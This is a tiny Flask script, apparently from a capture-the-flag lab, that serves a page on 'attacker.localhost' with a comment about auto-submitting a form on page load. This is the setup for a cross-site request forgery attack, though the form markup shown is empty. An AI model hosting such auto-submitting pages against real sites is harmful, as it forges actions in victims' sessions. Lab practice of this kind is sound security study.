from flask import Flask, render_template_string app = Flask("pwnc") @app.route("/") def hello(): # auto-submit on page load html_form = """
""" return render_template_string(html_form) app.run("attacker.localhost", 9999)